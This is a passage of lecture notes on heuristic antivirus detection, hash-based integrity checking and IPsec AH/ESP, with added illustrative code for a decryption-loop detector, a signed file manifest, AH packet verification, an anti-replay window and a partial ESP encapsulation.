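The static scan finds the plain infection at the end of the host and nothing at all in either mutated sample, which is exactly the signature problem; the x-ray loop recovers the key (0x69, or 0xFF for the NOT case) and the offset, but only because the transform is a fixed one-byte XOR. A per-byte or per-generation key, or an inserted decryptor that differs in every copy, is what pushes scanners towards the heuristics described next.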
Heuristic Search
Heuristic scanning looks for instructions or commands within a program that are not found in typical applications. As a result, a heuristic engine can detect potentially malicious functionality in new (not yet examined) code, such as the replication mechanism of a virus.
Classification of HS methods
• weight-based systems rate every functionality that is detected with a certain weight according to the degree of danger it may pose. If the sum of those weights reaches a certain threshold, an alarm is triggered (quite an old approach)
• rule-based systems extract certain rules from a file and compare them against a set of rules for malicious code. If a rule matches, an alarm is triggered
Virtual Sandbox
To determine what actions a program performs, most heuristic scanners use a sandboxed virtual machine
↓
When a user starts a program, the scanner first runs it inside the virtual machine. If no virus-like behaviour is observed, the program is allowed to start normally; if it is, the user is asked whether the file should be cleaned, deleted or quarantined
↓
Modern scanners can therefore detect new viruses without a signature
Problem: heuristic scanning is computationally intensive and reduces the computer's performance
Components of a Heuristic Engine
1 variable/memory emulator
2 parser
3 flow analyzer
4 analyzer
5 disassembler/emulator
6 weight-based system and/or rule-based system
Firstly, the input file is normalized: bad formatting is removed, variables are renamed, ...
Then, the engine looks for the entry point
• binary files: only one
• script-based files: usually more than one (all of them should be checked)
Main loop:
1 Extract one instruction
2 Identify the operation
3 Update the sandbox variable environment
Finally, when the complete program has been analyzed, the functionality found is rated (or compared with the set of rules) to decide whether the program is clean or not
Firewalls Viruses PPS Introduction Logic Antivirus
Heuristic Engines and Encrypted Viruses
Historically, heuristic engines could only assess what was visible to them
↓
encrypted viruses caused them major problems: the body is ciphertext, so no virus-like functionality is visible until it has been decrypted
↓
modern heuristic engines try to identify decryption loops, run through them (in the emulator), and assess the presence of an encryption loop together with the additional functionality that is then revealed
Heuristic Engines and Encrypted Viruses
So how does an AV scanner identify an encryption loop? The presence of any combination of the following conditions/instructions could indicate a decryption loop:
• initialization of a pointer with a valid memory address;
• initialization of a counter;
• memory read operation depending on the pointer;
• logical operation on the memory read result;
• memory write operation with the result from the logical operation;
• manipulation of the counter;
• branching depending on the counter.
Encryption loop example (M68k assembler)
Decryption with eor and key 1:
        lea     test(pc),a0     ;pointer to the encrypted bytes (PC-relative)
        move.l  #10,d0          ;counter: 10 bytes to decrypt
.loop   move.b  (a0),d1         ;read one byte through the pointer
        eor.b   #1,d1           ;xor with key equal to 1
        move.b  d1,(a0)+        ;write it back and advance the pointer
        subq.l  #1,d0           ;update the counter
        bne.s   .loop           ;if d0 is not 0 jump to .loop
When the loop finishes, the 10 bytes at test have been decrypted in place and can be executed. Note that every one of the seven conditions above appears in this loop.
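As an added example (my code, not from the lecture notes), here is a toy weight-based and rule-based heuristic that looks for the seven decryption-loop conditions listed above in a text listing. It parses the M68k-style syntax of the slide's example (labels start with '.', comments with ';'), which is a simplification: a real engine runs the same logic over the output of its disassembler/emulator. The weights, the threshold and the benign control loop are my own choices.

```python
# Added example (mine, not from the lecture notes): a toy weight-/rule-based
# heuristic for the seven decryption-loop conditions on the slide, applied to
# an M68k-style text listing. Weights and threshold are my choice.

CONDITIONS = {
    "pointer_init": 1,       # lea <addr>,aN
    "counter_init": 1,       # move #imm,dN
    "mem_read": 1,           # move (aN),dM
    "logic_op": 3,           # eor/and/or/not/rol/ror on dM
    "mem_write": 2,          # move dM,(aN)+ after the logical op
    "counter_update": 1,     # subq/addq/sub/add on dN
    "branch_on_counter": 1,  # conditional backward branch after the counter update
}
WEIGHT_THRESHOLD = 8
LOGIC = {"eor", "and", "or", "not", "rol", "ror"}


def parse(listing: str):
    """Return a list of (label, op, args). Labels must start with '.'; bare
    label lines (no instruction) are skipped."""
    insns = []
    for raw in listing.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line:
            continue
        label = None
        if line.startswith("."):
            head = line.split(None, 1)
            if len(head) == 1:
                continue
            label, line = head
        parts = line.split(None, 1)
        op = parts[0].lower()
        args = [a.strip().lower() for a in parts[1].split(",")] if len(parts) > 1 else []
        insns.append((label, op, args))
    return insns


def analyze(insns):
    """Map each matched condition to the index of the instruction that matched it."""
    found, pointers, counters, read_regs = {}, set(), set(), set()
    labels = {lbl: n for n, (lbl, _, _) in enumerate(insns) if lbl}
    for n, (_, op, a) in enumerate(insns):
        base = op.split(".")[0]
        src, dst = (a[0], a[-1]) if len(a) == 2 else (None, None)
        if base == "lea" and dst and dst.startswith("a"):
            pointers.add(dst); found["pointer_init"] = n
        elif base == "move" and src and src.startswith("#") and dst.startswith("d"):
            counters.add(dst); found["counter_init"] = n
        elif base == "move" and src and src.strip("()+-") in pointers and dst.startswith("d"):
            read_regs.add(dst); found["mem_read"] = n
        elif base in LOGIC and a and a[-1] in read_regs:
            found["logic_op"] = n
        elif base == "move" and src in read_regs and dst and dst.strip("()+-") in pointers:
            if "logic_op" in found:                 # write of the transformed byte
                found["mem_write"] = n
        elif base in {"subq", "addq", "sub", "add"} and a and a[-1] in counters:
            found["counter_update"] = n
        elif (base.startswith("b") and base not in {"bra", "bsr"} and len(a) == 1
              and a[0] in labels and labels[a[0]] < n and "counter_update" in found):
            found["branch_on_counter"] = n          # backward conditional branch
    return found


def classify(listing: str) -> dict:
    found = analyze(parse(listing))
    score = sum(CONDITIONS[c] for c in found)
    return {
        "conditions": sorted(found, key=found.get),
        "score": score,
        "weight_match": score >= WEIGHT_THRESHOLD,            # weight-based verdict
        "rule_match": all(c in found for c in CONDITIONS),   # rule-based verdict
    }


SLIDE_LOOP = """
        lea     test(pc),a0     ; pointer to the encrypted bytes
        move.l  #10,d0          ; counter
.loop   move.b  (a0),d1
        eor.b   #1,d1           ; xor with key equal to 1
        move.b  d1,(a0)+        ; write back, advance the pointer
        subq.l  #1,d0           ; update the counter
        bne.s   .loop           ; if d0 is not 0 jump to .loop
"""

BENIGN_COPY = """                ; constructed: a plain copy loop, no logical op
        lea     src(pc),a0
        move.l  #10,d0
.copy   move.b  (a0)+,d1
        move.b  d1,(a1)+
        subq.l  #1,d0
        bne.s   .copy
"""

if __name__ == "__main__":
    for name, src in (("slide loop", SLIDE_LOOP), ("benign copy", BENIGN_COPY)):
        print(name, classify(src))
```

The slide's loop matches all seven conditions (rule-based alarm) with a score of 10 (weight-based alarm); the copy loop shares five of them but never transforms what it reads, so neither method fires. Raising or lowering WEIGHT_THRESHOLD is exactly the false-positive/false-negative trade-off that makes weight-based systems hard to tune.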
Alternative to Antivirus
• When programs are installed from original media (manufacturer-sealed CD or DVD), it is possible to compute a hash of the installed files or directories and keep it in a safe way (e.g. electronically signed).
• Then, before an application is executed, the hash of its files is computed again and compared with the original one, to check that no change (i.e. no infection) has been made.
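An added example (my code, not from the lecture notes) of the scheme above as a signed file-hash manifest: every file is hashed with SHA-256 at install time and the manifest is authenticated with an HMAC key that has to live off the protected host. The HMAC stands in for the electronic signature the slide mentions; a real deployment would use a digital signature so that the verifier holds no secret. The install tree, the "infection" and the forged manifest are all constructed in a temporary directory.

```python
import hashlib
import hmac
import json
import os
import tempfile
from pathlib import Path

# Added example (mine, not from the lecture notes): the "alternative to
# antivirus" as a signed file-hash manifest. Install tree and infection are
# constructed; the HMAC key stands in for the slide's electronic signature.


def hash_tree(root: Path) -> dict:
    """Relative path -> SHA-256 hex digest of every regular file under root."""
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in sorted(root.rglob("*")) if p.is_file()}


def _canonical(hashes: dict) -> bytes:
    return json.dumps(hashes, sort_keys=True, separators=(",", ":")).encode()


def make_manifest(root: Path, key: bytes) -> str:
    hashes = hash_tree(root)
    mac = hmac.new(key, _canonical(hashes), hashlib.sha256).hexdigest()
    return json.dumps({"hashes": hashes, "mac": mac})


def verify(root: Path, manifest: str, key: bytes) -> dict:
    """Check the manifest MAC first, then diff the tree against it. A bad MAC
    means the manifest itself was tampered with, so none of its hashes count."""
    doc = json.loads(manifest)
    expected = hmac.new(key, _canonical(doc["hashes"]), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, doc["mac"]):
        return {"manifest_ok": False, "modified": [], "added": [], "missing": []}
    now, ref = hash_tree(root), doc["hashes"]
    return {"manifest_ok": True,
            "modified": sorted(p for p in ref if p in now and now[p] != ref[p]),
            "added": sorted(p for p in now if p not in ref),
            "missing": sorted(p for p in ref if p not in now)}


def demo():
    """Install and sign, simulate an appending infector, then a forged manifest;
    returns the three verification reports."""
    key = os.urandom(32)
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "bin").mkdir()
        (root / "bin" / "app.com").write_bytes(b"\xb8\x00\x4c\xcd\x21")   # mov ax,4c00h / int 21h
        (root / "readme.txt").write_text("clean install\n")
        manifest = make_manifest(root, key)
        clean = verify(root, manifest, key)
        with open(root / "bin" / "app.com", "ab") as f:      # infector appends its body
            f.write(b"\x90" * 16)
        (root / "bin" / "dropper.com").write_bytes(b"\xcc")   # and drops a new file
        infected = verify(root, manifest, key)
        forged = json.loads(manifest)                         # attacker edits the stored hash
        forged["hashes"]["bin/app.com"] = hashlib.sha256((root / "bin" / "app.com").read_bytes()).hexdigest()
        tampered = verify(root, json.dumps(forged), key)
    return clean, infected, tampered


if __name__ == "__main__":
    for name, report in zip(("clean", "infected", "forged manifest"), demo()):
        print(f"{name:16s}: {report}")
```

The second report names the modified program and the dropped file; the third shows why the manifest must be signed and not merely stored: an attacker who can edit the hashes would otherwise make the infected file verify. Note the check runs before execution, as the slide says, so it protects against file infectors but not against code that never touches the disk.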
Hot News
W32.Stuxnet is a worm that propagates on USB removable media drives by taking advantage of the "Microsoft Windows Shortcut LNK Files Automatic File Execution Vulnerability". It targets the SCADA (Supervisory Control and Data Acquisition) systems deployed in many industrial facilities, such as nuclear or fuel refinement plants
Possible target: attack on Iran's nuclear program
Online News
• Computer World UK
• ABC News
Contents
1 Perimetral Security: Firewalls
2 Viruses, Worms and Trojans
3 Point to Point Security
  Introduction
  VPN Architectures
  IPSec Fundamentals
  Practical Examples
Network Layer Security
Initially, computer networks were used by academic researchers for mail (or information in general) exchange
↓
Security was not very important
↓
Nowadays this is not the case: millions of users use the Internet to access their bank services, to buy products or services, etc.
Then we need to protect network communications at the layer that is responsible for routing packets across networks
Network Layers Description
TCP/IP is widely used throughout the world to provide network communications. TCP/IP communications are composed of four layers that work together:
• Application layer: sends and receives data for particular applications, such as DNS, HTTP and SMTP
• Transport layer: provides connection-oriented (TCP) or connectionless (UDP) services for transporting application layer data between hosts
• Network layer: routes packets across networks. The Internet Protocol (IP) is its fundamental protocol
• Data link layer: handles communications on the physical network components. The best-known data link layer protocol is Ethernet
The Need for Network Layer Security
Security controls exist for network communications at each layer of the TCP/IP model. The scope of the controls at each layer is:
• Application layer: separate controls must be established for each application. For example, Pretty Good Privacy (PGP) is commonly used to encrypt e-mail messages (SMTP)
• Transport layer: controls at this layer protect the data of a single communication session between two hosts. For example, the TLS/SSL protocols secure HTTP traffic
• Network layer: controls at this layer apply to all applications and are not application-specific. For example, IPsec secures all network communications between two hosts without modifying the applications
• Data link layer: controls are applied to all communications on a specific physical link, such as a dedicated circuit between two buildings or a dial-up modem connection to an ISP
Internet Protocol Security (RFCs 4301 & 4309)
IPsec is the most commonly used network layer security control. IPsec is a framework of open standards for ensuring private communications over IP networks. Depending on its implementation and configuration, it can provide any combination of the following types of protection:
• Confidentiality. IPsec can ensure that data cannot be read by unauthorized parties. This is accomplished by encrypting the data with a cryptographic algorithm and a secret key
• Integrity. IPsec can determine whether data has been changed in transit. Data integrity is assured by generating a message authentication code (MAC), a keyed cryptographic checksum of the data
• Peer Authentication. Each IPsec endpoint confirms the identity of the other IPsec endpoint, ensuring that the network traffic and data are being sent from the expected host
• Replay Protection. The same data is not delivered multiple times, and data is not delivered grossly out of order. However, IPsec does not ensure that data is delivered in the exact order in which it is sent
• Traffic Analysis Protection. A person monitoring the traffic does not know which parties are communicating, how often communications occur, or how much data is being exchanged. However, the number of packets can still be counted, so this protection is only partial
• Access Control. IPsec endpoints can perform filtering to ensure that only authorized IPsec users can access particular network resources
Virtual Private Networking (VPN)
The most common use of IPsec implementations is providing Virtual Private Networking (VPN) services
A VPN is a virtual network, built on top of existing physical networks, that can provide a secure communications mechanism for data and IP information transmitted between networks
↓
As VPNs can be used over the Internet, they facilitate the secure transfer of sensitive data across public networks
VPN Advantages
• VPNs are often less expensive than alternatives such as dedicated private communication lines (e.g. X.25 lines)
• VPNs can also provide flexible solutions, such as securing communications between remote telecommuters (remote workers) and the organization's servers, regardless of where the telecommuters are located
• A VPN can even be established within a single network to protect particularly sensitive communications from other parties on the same network (e.g. server administration)
VPN & Cryptography
VPNs use both symmetric (private key) and public key cryptography
• Symmetric (private key) cryptography uses the same key for both encryption and decryption (e.g. DES, 3DES, AES, ...). It is used for protecting the actual data because of its relative efficiency
• Public key cryptography uses separate keys for encryption and decryption, or to digitally sign and verify a signature (e.g. RSA, ...). It is used to authenticate the identities of both parties (and to establish the symmetric keys)
Gateway-to-Gateway Architecture
IPsec-based VPNs are often used to provide secure network communications between two networks by deploying a VPN gateway on each network and establishing a VPN connection between them.
Usually, to set up the VPN, one of the VPN gateways issues a request to the other to establish an IPsec connection. Routing on each network is configured so that, when hosts on one network need to communicate with hosts on the other network, their traffic is automatically routed through the IPsec connection
This is the easiest VPN model to implement in terms of user and host management: the hosts need no VPN software and the users take no action
Host-to-Gateway Architecture
This model is used to provide secure remote access. The organization deploys a VPN gateway on its network; each remote access user then establishes a VPN connection between his/her host and the VPN gateway
IPsec connections are created as needed for each individual VPN user. The user is typically asked by the VPN gateway to authenticate before the connection can be established
The host-to-gateway model is somewhat more complex to implement and maintain in terms of user and host management: every client host needs VPN software and every user needs credentials
Host-to-Host Architecture
This is the least commonly used VPN architecture. It is typically used for special-purpose needs, such as system administrators performing remote management of a single server.
This model is the only one that protects the data throughout its transit, end to end. This can also be a problem, because packet firewalls, IDS and other devices cannot be placed anywhere to inspect the decrypted data, which effectively circumvents certain layers of security
Model Comparison

Feature                                                       G-to-G   H-to-G   H-to-H
Provides protection between client and local gateway          No       N/A      N/A
Provides protection between VPN endpoints                     Yes      Yes      Yes
Provides protection between remote gateway and
  remote server (behind the gateway)                          No       No       N/A
Transparent to users                                          Yes      No       No
Transparent to servers                                        Yes      Yes      No
IPSec Components
IPsec is a collection of protocols that assist in protecting communications over IP networks, working together in various combinations
Main protocols
• Authentication Header (AH). It provides integrity protection for packet headers and data
• Encapsulating Security Payload (ESP). It provides authentication (integrity) and encryption services
• Internet Key Exchange (IKE). It negotiates, creates and manages security associations (SAs)
Authentication Header (AH)
AH provides integrity protection for packet headers and data, as well as authentication of the sender. It can optionally provide replay protection and access protection. AH cannot encrypt any portion of the packet.
Its usefulness is debatable, since ESP also provides authentication. However, AH is still of value because it can authenticate portions of the packet (the outer IP header) that ESP cannot
AH Modes
AH provides integrity protection for the entire packet, regardless of which mode is used.
• Tunnel mode: AH creates a new IP header for each packet. It is used in gateway VPNs
  [New IP Header] [AH Header] [Original IP Header] [Transport and Application Protocol Headers and Data]
  <------------------------ Authenticated (Integrity Protection) ------------------------>
• Transport mode: AH does not create a new IP header. It is used in host-to-host VPNs
  [IP Header] [AH Header] [Transport and Application Protocol Headers and Data]
  <------------------ Authenticated (Integrity Protection) ------------------>
Integrity Protection Process
The first step of integrity protection is to create a hash using a keyed hash algorithm → a message authentication code (MAC)
↓
Keyed hash algorithms create a hash based on both the message and a secret key shared by the two endpoints. The hash is added to the packet, which is sent to the recipient.
↓
The recipient can then regenerate the hash using the shared key and confirm that the two hashes match, providing integrity protection (and proof of origin) for the packet
Dynamic Header Fields
Certain IP header fields, such as time to live (TTL) and the IP header checksum, are dynamic and may change during routine communications (every router decrements the TTL and recomputes the checksum)
↓
If the hash were calculated over all the original IP header values, the hash recalculated by the recipient would be different
↓
To avoid this problem, IP header fields that may legitimately change in transit in an unpredictable manner are set to zero (i.e. excluded) in the integrity protection calculations
NAT Problems
For the same reason, AH is often incompatible with network address translation (NAT) implementations
↓
The IP source and destination address fields do not change on a legitimate path, so they are included in the AH integrity protection calculation
↓
If these addresses are altered by a NAT device, the AH integrity check made at the destination will not match, and the packet is dropped
AH Header
  Next Header (8 bits) | Payload Length (8 bits) | Reserved (16 bits)
  Security Parameters Index (32 bits)
  Sequence Number (32 bits)
  Authentication Information (ICV, variable length, a multiple of 32 bits)
• Next Header. It contains the IP protocol number of the next payload. In tunnel mode the payload is an IP packet, so the Next Header value is 4 (IP-in-IP). In transport mode the payload is usually a transport-layer protocol, often TCP (6) or UDP (17)
• Payload Length. The length of the AH header in 4-byte words, minus 2 (e.g. 4 for a 96-bit ICV)
• Reserved. Reserved for future use; it must be set to 0
• Security Parameters Index (SPI). Each endpoint has an arbitrarily chosen SPI value, which acts as a unique identifier for the connection. The recipient uses the SPI value, along with the destination IP address and (optionally) the IPsec protocol type, to determine which Security Association (SA) is being used
• Sequence Number. Each packet is assigned an increasing sequence number, and only packets within a sliding window of sequence numbers are accepted. This provides protection against replay attacks
• Authentication Information. This field contains the MAC output (integrity check value, ICV)
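The following is an added example (my code, not from the lecture notes) that builds an AH transport-mode packet over a constructed IPv4 + ICMP echo request. It shows the header layout from the list above, the ICV computed with the mutable IP fields zeroed (so a router's TTL decrement still verifies), and why a NAT device rewriting the source address breaks the check. HMAC-SHA1-96 (RFC 2404) is assumed for the ICV; the key and the addresses are made up; the SPI is the one from the slide's session example.

```python
import hashlib
import hmac
import struct

# Added example (mine, not from the lecture notes): AH transport mode over a
# constructed IPv4 + ICMP echo request. HMAC-SHA1-96 is assumed for the ICV;
# key and addresses are made up. Shows the "dynamic header fields" and NAT
# points from the slides above.

AH_PROTO, ICMP_PROTO, ICV_LEN = 51, 1, 12


def inet_checksum(b: bytes) -> int:
    """RFC 1071 one's-complement checksum (even-length input)."""
    s = sum(struct.unpack("!%dH" % (len(b) // 2), b))
    while s >> 16:
        s = (s & 0xFFFF) + (s >> 16)
    return (~s) & 0xFFFF


def ipv4_header(src: bytes, dst: bytes, proto: int, total_len: int, ttl: int = 64) -> bytes:
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 0x1234, 0x4000, ttl, proto, 0, src, dst)
    return hdr[:10] + struct.pack("!H", inet_checksum(hdr)) + hdr[12:]


def zero_mutable(ip: bytes) -> bytes:
    """Zero the IPv4 fields RFC 4302 treats as mutable: TOS (DSCP/ECN), flags and
    fragment offset, TTL and header checksum. The addresses are NOT zeroed."""
    b = bytearray(ip)
    b[1] = 0
    b[6:8] = b"\x00\x00"
    b[8] = 0
    b[10:12] = b"\x00\x00"
    return bytes(b)


def ah_header(next_header: int, spi: int, seq: int, icv: bytes = b"\x00" * ICV_LEN) -> bytes:
    payload_len = (12 + len(icv)) // 4 - 2       # AH length in 32-bit words, minus 2
    return struct.pack("!BBHII", next_header, payload_len, 0, spi, seq) + icv


def compute_icv(key: bytes, ip: bytes, ah: bytes, payload: bytes) -> bytes:
    """ICV over the whole packet with the mutable fields and the ICV field zeroed."""
    ah_zeroed = ah[:12] + b"\x00" * ICV_LEN
    return hmac.new(key, zero_mutable(ip) + ah_zeroed + payload, hashlib.sha1).digest()[:ICV_LEN]


def build_ah_packet(key, src, dst, payload, spi, seq, next_header=ICMP_PROTO) -> bytes:
    ip = ipv4_header(src, dst, AH_PROTO, 20 + 12 + ICV_LEN + len(payload))
    ah = ah_header(next_header, spi, seq)
    return ip + ah[:12] + compute_icv(key, ip, ah, payload) + payload


def verify_ah_packet(key, pkt) -> bool:
    ip, ah, payload = pkt[:20], pkt[20:20 + 12 + ICV_LEN], pkt[20 + 12 + ICV_LEN:]
    return hmac.compare_digest(ah[12:], compute_icv(key, ip, ah, payload))


def router_hop(pkt: bytes) -> bytes:
    """What every router does: decrement the TTL and recompute the IP checksum."""
    ip = bytearray(pkt[:20])
    ip[8] -= 1
    ip[10:12] = b"\x00\x00"
    ip[10:12] = struct.pack("!H", inet_checksum(bytes(ip)))
    return bytes(ip) + pkt[20:]


def nat_rewrite(pkt: bytes, new_src: bytes) -> bytes:
    """What a NAT device does: rewrite the source address (and the checksum)."""
    ip = bytearray(pkt[:20])
    ip[12:16] = new_src
    ip[10:12] = b"\x00\x00"
    ip[10:12] = struct.pack("!H", inet_checksum(bytes(ip)))
    return bytes(ip) + pkt[20:]


def icmp_echo_request(ident: int = 1, seq: int = 1, data: bytes = b"abcdefgh") -> bytes:
    msg = struct.pack("!BBHHH", 8, 0, 0, ident, seq) + data
    return msg[:2] + struct.pack("!H", inet_checksum(msg)) + msg[4:]


KEY = b"constructed-ah-key"                      # assumed: the SA's shared integrity key
HOST_A, HOST_B = bytes([192, 0, 2, 10]), bytes([192, 0, 2, 20])

if __name__ == "__main__":
    pkt = build_ah_packet(KEY, HOST_A, HOST_B, icmp_echo_request(), 0xCDB59934, 1)
    print("as sent        :", verify_ah_packet(KEY, pkt))
    print("after a router :", verify_ah_packet(KEY, router_hop(pkt)))
    print("after NAT      :", verify_ah_packet(KEY, nat_rewrite(pkt, bytes([198, 51, 100, 7]))))
```

The router hop changes two header fields (TTL and checksum) and the ICV still verifies, because both are zeroed on each side before the MAC is computed; the NAT rewrite changes one field that is not zeroed and the verification fails. That asymmetry is the whole of the "dynamic header fields" and "NAT problems" slides, and it is why AH and NAT traversal do not mix.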
How AH works
Example: an ICMP echo request packet in transport mode. The packet contains a single IP header, followed by the AH header and the ICMP message (the packet capture shown on the slide is not reproduced here)
How AH works
Example: AH headers of the first four packets of an AH session between hosts A and B
• SPI. A uses the hex value cdb59934 for the SPI in its packets, while host B uses the hex value a6b32c00 for the SPI in its packets. An AH connection is composed of two one-way connections (SAs), each with its own SPI
• Sequence Number. Both hosts initially set the sequence number to 1, and both incremented the number to 2 for their second packets
• Authentication Information. The authentication (integrity protection) information, a keyed hash over the bytes of the packet, is different in each packet. It is different even if only one byte in a hashed section changes
Encapsulating Security Payload (ESP)
ESP is the second core IPsec security protocol. It provides both encryption of the packet payload and authentication for integrity protection (although not of the outermost IP header)
↓
ESP's encryption and authentication can each be disabled
↓
ESP can be used to provide only encryption; encryption and integrity protection; or only integrity protection (encryption without integrity protection is not recommended, since ciphertext can then be manipulated without detection)
ESP Modes
• Tunnel mode: it creates a new IP header for each packet. The new IP header lists the endpoints of the ESP tunnel as the source and destination of the packet.
  [New IP Header] [ESP Header] [Original IP Header] [Transport and Application Protocol Headers and Data] [ESP Trailer] [ESP Auth. (optional)]
                               <------------------------------ Encrypted ------------------------------>
                  <------------------------- Authenticated (Integrity Protection) ------------------------->
  It can encrypt and/or protect the integrity of both the data and the original IP header. Encrypting the data protects it from being accessed or modified by unauthorized parties; encrypting the original IP header conceals the nature of the communications, such as the actual source or destination of the packet. If authentication is used for integrity protection, each packet carries an ESP Authentication section after the ESP trailer
• Transport mode: it uses the original IP header instead of creating a new one.
  [IP Header] [ESP Header] [Transport and Application Protocol Headers and Data] [ESP Trailer] [ESP Auth. (optional)]
                           <--------------------- Encrypted --------------------->
              <------------------ Authenticated (Integrity Protection) ------------------>
  It can only encrypt and/or protect the integrity of packet payloads and certain ESP components, but not IP headers. As with AH, ESP transport mode is generally only used in host-to-host architectures. Also, transport mode is incompatible with NAT (the transport-layer checksum inside the encrypted payload covers the IP addresses, and the NAT device cannot fix it up)
Encryption Process
ESP uses symmetric cryptography to encrypt IPsec packets. Both endpoints must use the same key to encrypt and decrypt the packets.
↓
When an endpoint encrypts data, it divides the data into small blocks (e.g. 128 bits each for the AES algorithm) and performs multiple rounds of cryptographic operations using the data blocks and the shared key
↓
When the other endpoint receives the encrypted data, it decrypts it using the same key and a similar process
ESP Packet Fields
Each ESP header is composed of two fields:
• SPI. Each endpoint of each IPsec connection has an arbitrarily chosen SPI value, which acts as a unique identifier for the connection. The recipient uses the SPI value, along with the destination IP address and (optionally) the IPsec protocol type (in this case, ESP), to determine which SA is being used
• Sequence Number. Each packet is assigned an increasing sequence number, and only packets within a sliding window of sequence numbers are accepted. This provides protection against replay attacks
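The sliding window mentioned for both the AH and the ESP sequence number, as an added example (my code, not from the lecture notes): this is the receiver-side anti-replay check of RFC 4302/4303 (64-packet window by default, 32 the minimum). The sequence numbers fed to it below are constructed to hit every case: new highest, late but inside the window, duplicate, and too old.

```python
# Added example (mine, not from the lecture notes): the anti-replay sliding
# window a receiver keeps per SA for the AH/ESP sequence number. Bit i of the
# bitmap is set when (top - i) has already been received. The 32-bit sequence
# number must never wrap: the SA is rekeyed before that (not handled here).


class ReplayWindow:
    def __init__(self, size: int = 64):
        self.size = size
        self.top = 0          # highest sequence number accepted so far
        self.bitmap = 0       # one bit per sequence number in [top - size + 1, top]

    def check_and_update(self, seq: int) -> bool:
        """Called only after the packet's ICV verified (a forged packet must not
        be able to move the window). Returns True to accept, False to drop."""
        if seq == 0:
            return False                          # the first packet of an SA is numbered 1
        if seq > self.top:                        # advances the right edge
            shift = seq - self.top
            if shift >= self.size:
                self.bitmap = 1                   # everything seen so far falls off the window
            else:
                self.bitmap = ((self.bitmap << shift) | 1) & ((1 << self.size) - 1)
            self.top = seq
            return True
        offset = self.top - seq
        if offset >= self.size:
            return False                          # left of the window: too old
        if (self.bitmap >> offset) & 1:
            return False                          # already received: replay
        self.bitmap |= 1 << offset
        return True


def filter_sequence(seqs, size: int = 64):
    """Run a list of (already authenticated) sequence numbers through one window
    and return the accept/reject decision for each."""
    w = ReplayWindow(size)
    return [w.check_and_update(s) for s in seqs]


if __name__ == "__main__":
    # constructed trace: host A's packets 1..4 as on the slide, a replayed 2,
    # a jump to 100, a late 50 (twice), 36 which has fallen off the window, and 37
    trace = [1, 2, 3, 4, 2, 100, 50, 50, 36, 37]
    for s, ok in zip(trace, filter_sequence(trace)):
        print(f"seq {s:3d}: {'accept' if ok else 'reject'}")
```

The window is what lets IPsec promise "not delivered multiple times, not delivered grossly out of order" while still accepting packets that arrive late over a reordering path; a packet older than the window is dropped even if its ICV is correct, which is why the check must come after, never instead of, the integrity verification.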
ESP Packet Fields
The next part of the packet is the payload. It is composed of:
• Payload data. It is encrypted
• Initialization vector (IV). It is not encrypted. The IV is used during encryption; its value is different in every packet, so even if two packets have the same content, the inclusion of the IV causes their encryption to give different results
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples
ESP Packet Fields
The third part of the packet is the ESP trailer, which contains• Padding. An ESP packet may optionally contain padding, which is additional
bytes of data that make the packet larger and are discarded by the packetsrecipient. Because ESP uses block ciphers for encryption, padding may beneeded so that the encrypted data is an integral multiple of the block size
• Padding Length. This number indicates how many bytes long the padding is
• Next Header. In tunnel mode, the payload is an IP packet, so the Next Headervalue is set to 4 for IP-in-IP. In transport mode, the payload is usually atransport-layer protocol, often TCP (6) or UDP (17)
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples
ESP Packet Fields
If ESP integrity protection is enabled, the ESP trailer is followed by an AuthenticationInformation field. As in AH header It contains the field contains the MAC output.Unlike AH, the MAC in ESP does not include the outermost IP header in itscalculations
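The packet format described above, as an added example written for this edit (it is not code from the original slides): an ESP encapsulation and decapsulation in Go using AES-128-CBC for encryption and HMAC-SHA-256 truncated to 128 bits as the ICV. The key sizes, the 16-byte IV, the `SAKeys`/`Decapsulated` names and the 64-bit-free layout (no extended sequence numbers) are this example's assumptions; the outer IP header is left out because the ESP ICV does not cover it.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha256"
	"encoding/binary"
	"errors"
)

// Wire format built by Encapsulate (RFC 4303 layout, simplified):
// SPI(4) | Seq(4) | IV(16) | AES-CBC(payload | padding | PadLen(1) | NextHeader(1)) | ICV(16)
const (
	blockSize = aes.BlockSize // 16 bytes: the 128-bit AES block the slide mentions
	icvLen    = 16            // HMAC-SHA-256 truncated to 128 bits (HMAC-SHA-256-128)
)

// SAKeys holds the symmetric keys both endpoints share for one SA (sizes assumed here).
type SAKeys struct {
	Enc  []byte // 16-byte AES-128 key
	Auth []byte // HMAC key
}

type Decapsulated struct {
	SPI, Seq   uint32
	NextHeader byte
	Payload    []byte
}

func icv(authKey, data []byte) []byte {
	m := hmac.New(sha256.New, authKey)
	m.Write(data)
	return m.Sum(nil)[:icvLen]
}

// Encapsulate builds one ESP packet; nextHeader is 4 (IPv4-in-IP), 6 (TCP) or 17 (UDP).
func Encapsulate(k SAKeys, spi, seq uint32, nextHeader byte, payload []byte) ([]byte, error) {
	block, err := aes.NewCipher(k.Enc)
	if err != nil {
		return nil, err
	}
	// Padding fills whole blocks; pad bytes are 1, 2, 3, ... so the receiver can check them.
	padLen := (blockSize - (len(payload)+2)%blockSize) % blockSize
	plain := append([]byte{}, payload...)
	for i := 1; i <= padLen; i++ {
		plain = append(plain, byte(i))
	}
	plain = append(plain, byte(padLen), nextHeader)
	iv := make([]byte, blockSize) // fresh random IV per packet, sent in the clear
	if _, err := rand.Read(iv); err != nil {
		return nil, err
	}
	ct := make([]byte, len(plain))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, plain)
	pkt := make([]byte, 8, 8+blockSize+len(ct)+icvLen)
	binary.BigEndian.PutUint32(pkt[0:4], spi) // the ESP header itself is not encrypted
	binary.BigEndian.PutUint32(pkt[4:8], seq)
	pkt = append(pkt, iv...)
	pkt = append(pkt, ct...)
	// The ICV covers SPI, Seq, IV and ciphertext; the outer IP header is not included.
	return append(pkt, icv(k.Auth, pkt)...), nil
}

// Decapsulate verifies the ICV before touching the cipher, so a forged or
// corrupted packet is dropped without being decrypted, then strips the trailer.
func Decapsulate(k SAKeys, pkt []byte) (out Decapsulated, err error) {
	if len(pkt) < 8+2*blockSize+icvLen {
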